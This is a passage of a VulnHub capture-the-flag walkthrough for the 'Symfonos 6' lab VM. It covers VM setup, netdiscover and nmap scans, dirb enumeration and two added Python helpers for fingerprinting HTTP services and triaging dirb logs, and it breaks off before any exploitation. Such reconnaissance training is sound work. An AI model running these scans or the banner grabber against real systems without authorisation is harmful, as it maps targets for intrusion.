Symfonos 6 || VulnHub Walkthrough

Hello, everyone! Welcome back to our VulnHub Walkthrough series. In today's video, we continue exploring the VulnHub "SymfonOS" collection with the sixth and final machine in the series, "SymfonOS 6". This intermediate, OSCP-like, real-world-style machine is designed to highlight the importance of understanding vulnerabilities and how to exploit them effectively.

Let’s get started!

To begin, head over to the VulnHub website and download the machine's image file. If you're new to VulnHub, check out our playlist for helpful guides on how to use the platform. 


Now, let’s get started with exploiting this machine!


Setting Up

Previously, we downloaded all six image files.

So, our next step is to set up the virtual image in VirtualBox. The download is a 7z archive, so start by extracting it. The extracted folder contains several files, including the VMDK disk image we need.

Now, our next step is creating a new virtual machine.


Creating a New VM

In VirtualBox, click "New" to create a new VM. 

Name it "SymfonOS 6", set the OS type to Linux, and choose "Other Linux (64-bit)" for the version, since the specific distribution is not known at this point.

Now, allocate the desired amount of RAM.

Next, select "Use an existing virtual hard disk file", locate the VMDK file, and click "Finish" to complete the setup.

Once the setup is finished, you'll see the "SymfonOS 6" vulnerable machine in the VirtualBox Manager. For better organization, I'll move it into the VulnHub group.

Network Configuration

Both the Kali Linux machine (our attacker) and the vulnerable machine must be on the same network, so make sure they are both attached to a Host-Only Adapter. Host-only also keeps a deliberately vulnerable VM off your LAN and away from the Internet, which is the only sensible way to run one.

So, go to "Settings" and change the network adapter to "Host-Only".

Since everything is ready, let’s attempt to start the VM to check if it works.


Start the VMs

Once it boots, you should see a login prompt, which means the machine is set up and ready. We don't need to log in here; everything from now on happens from the attacker side. Let's dive into the fun!

                                                                                                             

Enumeration

Identify the IP address

The first step in our attack is enumeration, where we identify the IP address of the target machine using netdiscover. netdiscover sends ARP requests and listens for the replies, so it only sees hosts on the same layer-2 segment, which is exactly what we want on a host-only network.

To run it, open a terminal and enter netdiscover -i <network interface name> (raw sockets need root, hence sudo). In this case the host-only interface is eth1:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

The command output displays a list of devices detected on the network, showing their IP and MAC addresses, as well as the associated vendor.

 Currently scanning: 192.168.108.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.2   08:00:27:b8:5c:2b      1      60  PCS Systemtechnik GmbH                                                                                
 192.168.103.18  08:00:27:39:ab:68      1      60  PCS Systemtechnik GmbH           

From these results, we can see three hosts along with their MAC addresses. The 08:00:27 prefix is the VirtualBox OUI (registered to PCS Systemtechnik GmbH, the VirtualBox vendor entry), so those two addresses belong to VirtualBox-managed interfaces, while 192.168.103.1 is the host's own host-only adapter. Our target machine's IP address is "192.168.103.18".


Mapping the Network

Next, we scan the target for open ports, a critical part of enumeration: every open port is a service, and every service is potential attack surface. For this task, we'll use the popular network scanner Nmap.

To execute the scan, open a terminal and run the command:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.18

In this command:

  • -sC : runs Nmap's default NSE scripts against each detected service to gather extra information (banners, SSH host keys, allowed HTTP methods, and so on).
  • -sV : enables version detection, so Nmap sends probes to each open port and matches the responses against its service fingerprint database.

Because the scan runs as an unprivileged user, Nmap falls back to a TCP connect scan of its default top 1,000 ports (the "conn-refused" note in the output below confirms this). Anything listening on a less common port would be missed, so a follow-up scan of the full range with -p- is worth running before moving on.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 13:17 EST
Nmap scan report for 192.168.103.18
Host is up (0.00047s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 0e:ad:33:fc:1a:1e:85:54:64:13:39:14:68:09:c1:70 (RSA)
|   256 54:03:9b:48:55:de:b3:2b:0a:78:90:4a:b3:1f:fa:cd (ECDSA)
|_  256 4e:0c:e6:3d:5c:08:09:f4:11:48:85:a2:e7:fb:8f:b7 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
| http-methods: 
|_  Potentially risky methods: TRACE
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=49fd5825fad5aa8d; Path=/; HttpOnly
|     Set-Cookie: _csrf=Pk916asD1Xz4WaGVF4mpyjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA; Path=/; Expires=Mon, 02 Dec 2024 18:17:14 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|     console.info('ServiceWorker registration successful with scope: ', registrat
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=82b3bbaff5fa3556; Path=/; HttpOnly
|     Set-Cookie: _csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2OA; Path=/; Expires=Mon, 02 Dec 2024 18:17:20 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:20 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|_    console.info('ServiceWorker registration successful
3306/tcp open  mysql   MariaDB (unauthorized)
5000/tcp open  upnp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Sun, 01 Dec 2024 18:17:44 GMT
|     Content-Length: 18
|     page not found
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Sun, 01 Dec 2024 18:17:14 GMT
|     Content-Length: 18
|     page not found
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain
|     Date: Sun, 01 Dec 2024 18:17:29 GMT
|     Content-Length: 18
|_    page not found
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=12/1%Time=674CA82B%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nContent-Typ
SF:e:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path
SF:=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=49fd5825fad5aa
SF:8d;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=Pk916asD1Xz4WaGVF4mp
SF:yjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA;\x20Path=/;\x20Expires=Mon,\x2002\x2
SF:0Dec\x202024\x2018:17:14\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAM
SF:EORIGIN\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018:17:15\x20GMT\r\n\r\
SF:n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\">\n<head\x20data-suburl=\"\
SF:">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20cont
SF:ent=\"width=device-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv=
SF:\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>\x20Symfonos6</ti
SF:tle>\n\t<link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crosso
SF:rigin=\"use-credentials\">\n\t\n\t<script>\n\t\tif\x20\('serviceWorker'
SF:\x20in\x20navigator\)\x20{\n\t\t\tnavigator\.serviceWorker\.register\('
SF:/serviceworker\.js'\)\.then\(function\(registration\)\x20{\n\t\t\t\t\n\
SF:t\t\t\tconsole\.info\('ServiceWorker\x20registration\x20successful\x20w
SF:ith\x20scope:\x20',\x20registrat")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,216B,"HTTP/1\.
SF:0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html;\x20charset=UTF-
SF:8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet
SF:-Cookie:\x20i_like_gitea=82b3bbaff5fa3556;\x20Path=/;\x20HttpOnly\r\nSe
SF:t-Cookie:\x20_csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2
SF:OA;\x20Path=/;\x20Expires=Mon,\x2002\x20Dec\x202024\x2018:17:20\x20GMT;
SF:\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2001\x
SF:20Dec\x202024\x2018:17:20\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20la
SF:ng=\"en-US\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\"
SF:>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\
SF:"ie=edge\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Symfonos6</title
SF:>\n\t<link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorig
SF:in=\"use-credentials\">\n\t\n\t<script>\n\t\tif\x20\('serviceWorker'\x2
SF:0in\x20navigator\)\x20{\n\t\t\tnavigator\.serviceWorker\.register\('/se
SF:rviceworker\.js'\)\.then\(function\(registration\)\x20{\n\t\t\t\t\n\t\t
SF:\t\tconsole\.info\('ServiceWorker\x20registration\x20successful\x20");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.94SVN%I=7%D=12/1%Time=674CA82B%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nCon
SF:tent-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018:17
SF::14\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20found"
SF:)%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(HTTPOptions,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\n
SF:Content-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x2018
SF::17:29\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20fou
SF:nd")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(FourOhFourRequest,7F,"HTTP/1\.0\x20404\x20Not\x20Found\r\
SF:nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2001\x20Dec\x202024\x201
SF:8:17:44\x20GMT\r\nContent-Length:\x2018\r\n\r\n404\x20page\x20not\x20fo
SF:und")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Typ
SF:e:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x
SF:20Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reque
SF:st\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20c
SF:lose\r\n\r\n400\x20Bad\x20Request");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.14 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After the scan completes, the results reveal five open ports:

  • Port 22 (TCP): OpenSSH 7.4, which allows remote access with valid credentials. This is the version shipped with CentOS 7, matching the Apache banner on port 80. It becomes relevant once we find credentials elsewhere; weak or reused passwords are the usual way in.
  • Port 80 (TCP): Apache httpd 2.4.6 (CentOS) with PHP 5.6.40, both long past end of life. The default page has no title. The http-methods script reports TRACE enabled, which is a hardening miss rather than a way in; the real interest is whatever PHP applications are hosted here.
  • Port 3000 (TCP): Nmap labels it "ppp?" only because that is the name in its port table; the fingerprint strings show an HTTP server that sets an i_like_gitea session cookie and serves a page titled "Symfonos6", so this is Gitea, a self-hosted Git service. Repositories are a classic source of leaked credentials and configuration, and weak or default accounts are worth trying.
  • Port 3306 (TCP): MariaDB. "(unauthorized)" means the server answered but rejected our host at the connection stage (typically "Host ... is not allowed to connect"), so it is reachable from the network but restricted by its grant tables. It matters if we obtain credentials, or if the web applications talk to it.
  • Port 5000 (TCP): again, "upnp?" is just a port-table guess. The service returns a plain-text "404 page not found" for every path and Go net/http's canonical "400 Bad Request" reply for malformed input, so it is most likely a custom Go web application (Gitea, also written in Go, produces the same 400 reply on port 3000). Its routes are unknown and will have to be enumerated separately.

Each of these is a potential entry point. The next step is deeper enumeration of every service to uncover vulnerabilities or clues that lead to initial access; what we learn there decides the order in which we attack them.
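Nmap could not name the services on 3000 and 5000, but the raw responses it captured are enough to do it by hand. The following Python script is an added example, not part of the original walkthrough: it parses a raw HTTP response, applies a few fingerprinting rules (the Gitea session cookie, Go net/http's canonical 400 reply, the Gin-style 404 body) and includes a small banner grabber for live use. The three sample responses are constructed from the nmap fingerprint-strings above; the classification rules are my own heuristics, not nmap's probe database.

```python
"""Fingerprint the 'unknown' HTTP ports (3000, 5000) from raw responses.

Added example; not part of the original walkthrough. The SAMPLE_* bytes are
constructed from the nmap fingerprint-strings in the scan, and the rules in
classify() are heuristics of my own, not nmap's.
"""
import re
import socket
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class HttpFingerprint:
    status: Optional[int] = None
    headers: Dict[str, str] = field(default_factory=dict)   # lower-cased names
    cookies: List[str] = field(default_factory=list)        # "name=value" only
    body: str = ""


def parse_http_response(raw: bytes) -> HttpFingerprint:
    """Split a raw HTTP/1.x response into status, headers, cookies and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    fp = HttpFingerprint(body=body.decode("utf-8", "replace"))
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    fp.status = int(m.group(1)) if m else None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            fp.cookies.append(value.split(";", 1)[0])   # drop Path/HttpOnly attrs
        else:
            fp.headers[name] = value
    return fp


def classify(fp: HttpFingerprint) -> List[str]:
    """Return human-readable guesses about what produced the response."""
    guesses = []
    ctype = fp.headers.get("content-type", "")
    body = fp.body.strip()
    if any(c.startswith("i_like_gitea=") for c in fp.cookies):
        guesses.append("Gitea (sets the 'i_like_gitea' session cookie)")
    # Go's net/http answers a malformed request with exactly this reply.
    if (fp.status == 400 and body == "400 Bad Request"
            and ctype == "text/plain; charset=utf-8"
            and fp.headers.get("connection", "").lower() == "close"):
        guesses.append("Go net/http server (canonical malformed-request reply)")
    # Gin's default 404 is this bare 18-byte body with a plain text/plain;
    # net/http's http.NotFound would add a charset and a trailing newline.
    if fp.status == 404 and ctype == "text/plain" and body == "404 page not found":
        guesses.append("Go web app, Gin-style default 404 handler")
    if "server" in fp.headers:
        guesses.append(f"Server header: {fp.headers['server']}")
    return guesses or ["unidentified HTTP service"]


def grab(host: str, port: int, request: bytes = b"GET / HTTP/1.0\r\n\r\n",
         timeout: float = 5.0, limit: int = 65536) -> bytes:
    """Send one raw request and read the reply (send garbage to provoke a 400)."""
    chunks, total = [], 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        while total < limit:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
            total += len(data)
    return b"".join(chunks)


# Constructed samples, copied from the nmap fingerprint-strings in the scan.
SAMPLE_3000 = (b"HTTP/1.0 200 OK\r\n"
               b"Content-Type: text/html; charset=UTF-8\r\n"
               b"Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647\r\n"
               b"Set-Cookie: i_like_gitea=49fd5825fad5aa8d; Path=/; HttpOnly\r\n"
               b"X-Frame-Options: SAMEORIGIN\r\n\r\n"
               b"<!DOCTYPE html>\n<title> Symfonos6</title>")
SAMPLE_5000 = (b"HTTP/1.0 404 Not Found\r\nContent-Type: text/plain\r\n"
               b"Content-Length: 18\r\n\r\n404 page not found")
SAMPLE_BAD = (b"HTTP/1.1 400 Bad Request\r\nContent-Type: text/plain; charset=utf-8\r\n"
              b"Connection: close\r\n\r\n400 Bad Request")

if __name__ == "__main__":
    for label, raw in (("3000", SAMPLE_3000), ("5000", SAMPLE_5000), ("garbage", SAMPLE_BAD)):
        print(label, classify(parse_http_response(raw)))
    # Live: classify(parse_http_response(grab("192.168.103.18", 5000, b"HELP\r\n")))
```

Sending a deliberately malformed request (for example b"HELP\r\n") through grab() is what produces the 400 reply; nmap's GenericLines probe relies on the same trick. The Gin inference rests only on the missing charset and missing trailing newline, so treat it as a hint to confirm, not a fact.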


Web Enumeration

Our next steps focus on identifying vulnerabilities to gain shell access or another foothold on the target system. The HTTP web server, running on Port 80, will be our starting point, as web services are often key entry points and can uncover additional attack vectors.

Begin by accessing the web service by entering the target's IP address into a web browser. 

The displayed webpage features an image depicting a Greek mythology scene, likely referencing the Trojan War or a similar legendary battle .

Inspecting the page source using CTRL + U does not reveal any hidden information. 


Web Directory Enumeration

To discover resources that are not linked from the page, we perform directory enumeration with a tool such as dirb or Gobuster. These tools request every entry of a wordlist against the web root (and, in dirb's case, recurse into each directory they find), using the HTTP status code and response size to tell real files and directories apart from the server's default "not found" page. This often surfaces admin panels, backup files, or entire applications that are invisible from the home page.
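dirb's output for a site like this runs to hundreds of lines, and most of it is the same handful of 403 responses repeated in every subdirectory: a name that is refused everywhere it is guessed is almost certainly matched by a server-wide deny rule (a <Files> or .htaccess directive), not a file that exists in each of those directories. The following Python script is an added example, not part of the original walkthrough: it parses a dirb log and separates the real findings (2xx/5xx hits, discovered directories, listable directories) from that repeated 403 noise. The embedded sample log is a constructed excerpt of the dirb output shown further down; the noise threshold is an assumption of mine that you can tune.

```python
"""Triage a dirb log: keep the real findings, drop the repeated 403 noise.

Added example, not part of the original walkthrough. SAMPLE_LOG is a
constructed excerpt of the dirb output on this page; NOISE_THRESHOLD is
an assumed cut-off of my own, not a dirb option.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

HIT_RE = re.compile(r"^\+ (?P<url>\S+) \(CODE:(?P<code>\d{3})\|SIZE:(?P<size>\d+)\)")
DIR_RE = re.compile(r"^==> DIRECTORY: (?P<url>\S+)")
ENTER_RE = re.compile(r"^---- Entering directory: (?P<url>\S+) ----")
NOISE_THRESHOLD = 2   # a name refused (403) in more dirs than this is a deny rule


def basename(url: str) -> str:
    return url.rstrip("/").rsplit("/", 1)[-1]


def parse_dirb(log: str) -> Dict[str, list]:
    """Pull hits, discovered directories and listable directories out of a dirb log."""
    hits: List[Tuple[str, int, int]] = []
    directories: List[str] = []
    listable: List[str] = []
    current = None                      # directory dirb is currently inside
    for line in log.splitlines():
        line = line.strip()
        if m := HIT_RE.match(line):
            hits.append((m["url"], int(m["code"]), int(m["size"])))
        elif m := DIR_RE.match(line):
            directories.append(m["url"])
        elif m := ENTER_RE.match(line):
            current = m["url"]
        elif "Directory IS LISTABLE" in line and current:
            listable.append(current)    # autoindex is on: just browse it
    return {"hits": hits, "directories": directories, "listable": listable}


def triage(log: str, noise_threshold: int = NOISE_THRESHOLD) -> Dict[str, object]:
    """Separate real hits from file names that come back 403 everywhere.

    dirb tries the same wordlist in every directory it enters. A name that
    is refused in more than `noise_threshold` directories is almost certainly
    a server-wide deny rule on the name, not evidence the file exists there.
    """
    parsed = parse_dirb(log)
    refused = Counter(basename(u) for u, code, _ in parsed["hits"] if code == 403)
    noisy = {name for name, n in refused.items() if n > noise_threshold}
    interesting = []
    for url, code, size in parsed["hits"]:
        if code == 403 and basename(url) in noisy:
            continue
        if code == 200 and size <= 1:   # empty placeholder index.html
            continue
        interesting.append((url, code, size))
    return {"interesting": interesting, "noisy_names": noisy,
            "directories": parsed["directories"], "listable": parsed["listable"]}


# Constructed excerpt of the dirb run against this target.
SAMPLE_LOG = """\
+ http://192.168.103.18/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.103.18/flyspray/
+ http://192.168.103.18/index.html (CODE:200|SIZE:251)
==> DIRECTORY: http://192.168.103.18/posts/
---- Entering directory: http://192.168.103.18/flyspray/ ----
==> DIRECTORY: http://192.168.103.18/flyspray/avatars/
==> DIRECTORY: http://192.168.103.18/flyspray/docs/
+ http://192.168.103.18/flyspray/index.php (CODE:200|SIZE:25824)
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/
+ http://192.168.103.18/flyspray/robots.txt (CODE:200|SIZE:34)
---- Entering directory: http://192.168.103.18/posts/ ----
+ http://192.168.103.18/posts/index.php (CODE:500|SIZE:943)
---- Entering directory: http://192.168.103.18/flyspray/avatars/ ----
+ http://192.168.103.18/flyspray/avatars/index.html (CODE:200|SIZE:1)
---- Entering directory: http://192.168.103.18/flyspray/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://192.168.103.18/flyspray/plugins/ ----
+ http://192.168.103.18/flyspray/plugins/admin.php (CODE:403|SIZE:228)
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/
+ http://192.168.103.18/flyspray/plugins/phpinfo.php (CODE:403|SIZE:230)
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/admin.php (CODE:403|SIZE:237)
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/
+ http://192.168.103.18/flyspray/plugins/dokuwiki/phpinfo.php (CODE:403|SIZE:239)
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/admin.php (CODE:403|SIZE:241)
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/phpinfo.php (CODE:403|SIZE:243)
"""

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("listable:", *result["listable"])
    print("suppressed 403 names:", sorted(result["noisy_names"]))
    for url, code, size in result["interesting"]:
        print(f"{code} {size:>6}  {url}")
```

Run it on a saved log (dirb ... -o dirb.txt) and what remains is what actually deserves a look: the /flyspray/ application with its robots.txt, the /posts/index.php that errors with a 500, and the directories Apache lets us browse directly.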

Execute the appropriate commands in the terminal to initiate the enumeration process.

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.103.18/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec  1 13:21:48 2024
URL_BASE: http://192.168.103.18/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.103.18/ ----
+ http://192.168.103.18/cgi-bin/ (CODE:403|SIZE:210)                                                                                                     
==> DIRECTORY: http://192.168.103.18/flyspray/                                                                                                           
+ http://192.168.103.18/index.html (CODE:200|SIZE:251)                                                                                                   
==> DIRECTORY: http://192.168.103.18/posts/                                                                                                              
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/ ----
+ http://192.168.103.18/flyspray/attachments (CODE:403|SIZE:222)                                                                                         
==> DIRECTORY: http://192.168.103.18/flyspray/avatars/                                                                                                   
==> DIRECTORY: http://192.168.103.18/flyspray/cache/                                                                                                     
==> DIRECTORY: http://192.168.103.18/flyspray/docs/                                                                                                      
+ http://192.168.103.18/flyspray/favicon.ico (CODE:200|SIZE:894)                                                                                         
==> DIRECTORY: http://192.168.103.18/flyspray/fonts/                                                                                                     
+ http://192.168.103.18/flyspray/includes (CODE:403|SIZE:219)                                                                                            
+ http://192.168.103.18/flyspray/index.php (CODE:200|SIZE:25824)                                                                                         
==> DIRECTORY: http://192.168.103.18/flyspray/js/                                                                                                        
==> DIRECTORY: http://192.168.103.18/flyspray/lang/                                                                                                      
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/                                                                                                   
+ http://192.168.103.18/flyspray/robots.txt (CODE:200|SIZE:34)                                                                                           
==> DIRECTORY: http://192.168.103.18/flyspray/scripts/                                                                                                   
==> DIRECTORY: http://192.168.103.18/flyspray/themes/                                                                                                    
==> DIRECTORY: http://192.168.103.18/flyspray/vendor/                                                                                                    
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/posts/ ----
==> DIRECTORY: http://192.168.103.18/posts/css/                                                                                                          
==> DIRECTORY: http://192.168.103.18/posts/includes/                                                                                                     
+ http://192.168.103.18/posts/index.php (CODE:500|SIZE:943)                                                                                              
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/avatars/ ----
+ http://192.168.103.18/flyspray/avatars/index.html (CODE:200|SIZE:1)                                                                                    
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/cache/ ----
+ http://192.168.103.18/flyspray/cache/index.html (CODE:200|SIZE:0)                                                                                      
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/fonts/ ----
+ http://192.168.103.18/flyspray/fonts/index.html (CODE:200|SIZE:1)                                                                                      
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/ ----
+ http://192.168.103.18/flyspray/plugins/admin.php (CODE:403|SIZE:228)                                                                                   
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/                                                                                          
+ http://192.168.103.18/flyspray/plugins/index.php (CODE:403|SIZE:228)                                                                                   
+ http://192.168.103.18/flyspray/plugins/info.php (CODE:403|SIZE:227)                                                                                    
+ http://192.168.103.18/flyspray/plugins/phpinfo.php (CODE:403|SIZE:230)                                                                                 
+ http://192.168.103.18/flyspray/plugins/xmlrpc.php (CODE:403|SIZE:229)                                                                                  
+ http://192.168.103.18/flyspray/plugins/xmlrpc_server.php (CODE:403|SIZE:236)                                                                           
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/scripts/ ----
